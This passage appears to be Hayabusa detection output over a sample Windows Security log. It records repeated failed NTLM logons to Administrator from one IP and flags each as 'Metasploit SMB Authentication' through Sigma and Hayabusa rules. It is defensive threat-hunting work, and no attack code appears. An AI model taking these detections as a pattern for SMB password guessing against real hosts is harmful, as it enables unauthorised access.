Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 